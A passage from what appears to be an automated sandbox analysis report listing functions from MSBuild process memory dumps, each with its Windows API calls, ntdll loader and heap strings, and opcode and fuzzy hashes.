                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A660 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 272 41a660-41a691 call 41af50 RtlFreeHeap
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                                                  • Instruction ID: bc8b067cd83da56cee666b5c28ce04d4f8bf1b8054c0557e0bc192b3240f86e0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAE012B1200208ABDB18EF99CC49EA777ACAF88764F018559BA1C5B242C630E9108AB4
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 275 41a7c0-41a7f4 call 41af50 LookupPrivilegeValueW
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                                                  • Instruction ID: b271a6b6fd8fca1a6df64550df1cef4b538e167436523c48f1a9ef262b7a55b1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FE01AB12002086BDB10DF49CC85EE737ADAF88654F018155BA0C57241C934E8118BF5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A6A0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                                                  • Instruction ID: 02052f1feec4c32fa888e0c2ff15824475a9bddcc7bd9f2d7c69f560d23a1846
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CBD017726002187BD620EB99CC85FD777ACDF487A4F0180A9BA1C6B242C531BA108AE5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A69B Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  • Opcode ID: f4eac56545df63d200f9130e130bb7c59e52f569d4dd6813052640abf62373b0
                                                                                                                                                                                                                                                                  • Instruction ID: f35e3ff5370f572d4c91b1e9ca30f4c6ae7ec82f74325434eb02f65617823675
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4eac56545df63d200f9130e130bb7c59e52f569d4dd6813052640abf62373b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE012716402047FD724DF58CC86FD73B68EF58350F118159F92CAB341D531A611CAA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0041A654 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                  • Opcode ID: 935cfe924ffcefbbe69dd87542e212a5537746fb9f1b7a4f3b472c1c061dbcd7
                                                                                                                                                                                                                                                                  • Instruction ID: 0ff4f964a9746a84de42fe428e2cb22ba09e9692bb0b7cafa7ab5ceb7444d77e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 935cfe924ffcefbbe69dd87542e212a5537746fb9f1b7a4f3b472c1c061dbcd7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7BB012B0A491213640039DA42DCD82E1010035550478AC419E046EBED3EA0DC263D0ED
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                  • Opcode ID: f9f2876e40d178c893d832d858fffc720e5f32aaf5530fe1ca0b09ff4246b09c
                                                                                                                                                                                                                                                                  • Instruction ID: cd260083be4572de67b8834695599316c2f28d318a0339e4f949de61e9119987
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9f2876e40d178c893d832d858fffc720e5f32aaf5530fe1ca0b09ff4246b09c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9EB09B769015D5C5EE11E7645608717791077D0705F15C065E2030641F4739D5D5E376
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 01402349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-2160512332
                                                                                                                                                                                                                                                                  • Opcode ID: 6c5c3bd0c3cff2fe2866e73dbfb0473bb2b491b8c48f81cf86ab527a2c3e7002
                                                                                                                                                                                                                                                                  • Instruction ID: 07921d4aedb517421d40701a1d5953cbffa801a1f987f360095a4139ed319dbc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c5c3bd0c3cff2fe2866e73dbfb0473bb2b491b8c48f81cf86ab527a2c3e7002
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9927F716047429FE722DE1AC884F6BBBE8BB84754F04492EFA94D72E0D7B0D845CB52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013768B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                  • API String ID: 0-3089669407
                                                                                                                                                                                                                                                                  • Opcode ID: 69b9db93912582d1ad44b46d7a46a1ba828936d31e1b37bb800b55ba58fa51f2
                                                                                                                                                                                                                                                                  • Instruction ID: 8cc42d6b65bd9eb93ecb201f82f5635d206c11b87b3327e4bd54c8f5ceeae254
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69b9db93912582d1ad44b46d7a46a1ba828936d31e1b37bb800b55ba58fa51f2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 968122B2D012197FDB21EBD9EDD5EEE77BDEB046587454426F900FB210E620ED058BA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B0F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                                                                                                                  • API String ID: 0-360209818
                                                                                                                                                                                                                                                                  • Opcode ID: 4abdf5d90fb8571d5b09877d8c49a6706ee6dcc00d80ef69708f74709403250d
                                                                                                                                                                                                                                                                  • Instruction ID: 6293346e8643a96630bb0502e9770ba3dcdba1bde3044898b5f4297fd895425b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4abdf5d90fb8571d5b09877d8c49a6706ee6dcc00d80ef69708f74709403250d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 916291B5E00229CFDB24CF18D8507A9BBB6AF95328F5481DAD64DAB640E7325AD1CF40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014312ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                                                                                                  • API String ID: 0-3591852110
                                                                                                                                                                                                                                                                  • Opcode ID: a7061645a797c3cc3474a372b0fe15dbf9f96399789d90c1665e06a8588381a2
                                                                                                                                                                                                                                                                  • Instruction ID: c056f0698e99719f10634a99b564c6cd6a1af187ffbf15deefc2a880b0952e6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a7061645a797c3cc3474a372b0fe15dbf9f96399789d90c1665e06a8588381a2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 05129F30600642DFE7268F69C445BB6BBF1FF99B14F18845EE4968B7A1D734E881CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0139AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                  • API String ID: 0-3197712848
                                                                                                                                                                                                                                                                  • Opcode ID: 4f6266e8864d2c151fdfc9c852f81752dd35c13cfb8509c613184cda4d14bfaa
                                                                                                                                                                                                                                                                  • Instruction ID: 588b0b80216c879fc2ee8970bd56facdc4dbc92c586241a1680c5521c3f21091
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f6266e8864d2c151fdfc9c852f81752dd35c13cfb8509c613184cda4d14bfaa
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1112F371A083558BDB24DF28C844BAABBE5BF8470CF04465DF9899B391E734D948CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                                  • API String ID: 0-3532704233
                                                                                                                                                                                                                                                                  • Opcode ID: 1b48f83c1b68050deaa43159ca4f1b5791ebce53c844997b0fbb1e49311ee466
                                                                                                                                                                                                                                                                  • Instruction ID: 47c4fea02aa045da31ee7ea080d52f4eebd90ef2f57bfd14b4d6bc46f58b8b89
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1b48f83c1b68050deaa43159ca4f1b5791ebce53c844997b0fbb1e49311ee466
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15B1CE725083569FDB21DF68C580A6BBBE8BF88758F05492EF989D7200D734DD48CB92
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01430CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                                                                                                                  • API String ID: 0-1357697941
                                                                                                                                                                                                                                                                  • Opcode ID: ff75eed58bb91e3ae9bbb9a7279e22f569d95f0bd44f026396e39e5e0b0ca73e
                                                                                                                                                                                                                                                                  • Instruction ID: acc00fc9367f82eb95ed05a9a4f0606603171448d6875980fabd569f2cbf3406
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff75eed58bb91e3ae9bbb9a7279e22f569d95f0bd44f026396e39e5e0b0ca73e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37F1F031A00246EFDB25CF68C480BAAFBF5FF4DB18F08815AE5859B761C774A946CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01419179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                                                                                                                  • API String ID: 2994545307-3063724069
                                                                                                                                                                                                                                                                  • Opcode ID: 138a11be3ba6a444fdd99f9a5a58c8efd73fea075f84aa781ee2d9295ec4864f
                                                                                                                                                                                                                                                                  • Instruction ID: f8b9527a36f95303e222e20d0c1e24b2e46a5cf0d6e217dd9347cd202ef9e032
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 138a11be3ba6a444fdd99f9a5a58c8efd73fea075f84aa781ee2d9295ec4864f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77D1F972808352AFD721DB58C850B6BBBE8AF94B1CF45492EFA4897264D770DD04C7E2
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01430274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                                  • API String ID: 0-1700792311
                                                                                                                                                                                                                                                                  • Opcode ID: 78b9e8bf1adf23cf416ab69bf694fbcea2be5cc69dddf3edcf2f25dfb65de6fb
                                                                                                                                                                                                                                                                  • Instruction ID: 03bc85ec3004b7bb5dbb1d152e3745c7495d40daf0d98b7a17f8d4d594ffd6a1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78b9e8bf1adf23cf416ab69bf694fbcea2be5cc69dddf3edcf2f25dfb65de6fb
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6D1CE31600686DFDB22DF68C840AAEFBF1FF9A714F18825AF4499B362C7349941CB10
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0137D2C3
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D0FD
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D313
                                                                                                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0137D196
                                                                                                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0137D262
                                                                                                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0137D0CF
                                                                                                                                                                                                                                                                  • @, xrefs: 0137D2AF
                                                                                                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0137D146
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                                                  • API String ID: 0-1356375266
                                                                                                                                                                                                                                                                  • Opcode ID: 46b97690c74dd12c4382768a3fcc5f14291260050049a774af59fdf0e1a46d4b
                                                                                                                                                                                                                                                                  • Instruction ID: ed1e7915d2d54952dbf0f9dcb886aee228fe22964da046a3a1b2408e72a7ff0f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46b97690c74dd12c4382768a3fcc5f14291260050049a774af59fdf0e1a46d4b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 99A16D729083469FE721DF69D544B5BBBE8BF84719F00492EF98897240E778D908CF52
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01399EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • sxsisol_SearchActCtxForDllName, xrefs: 013E76DD
                                                                                                                                                                                                                                                                  • @, xrefs: 01399EE7
                                                                                                                                                                                                                                                                  • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 013E7709
                                                                                                                                                                                                                                                                  • Status != STATUS_NOT_FOUND, xrefs: 013E789A
                                                                                                                                                                                                                                                                  • Internal error check failed, xrefs: 013E7718, 013E78A9
                                                                                                                                                                                                                                                                  • minkernel\ntdll\sxsisol.cpp, xrefs: 013E7713, 013E78A4
                                                                                                                                                                                                                                                                  • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 013E76EE
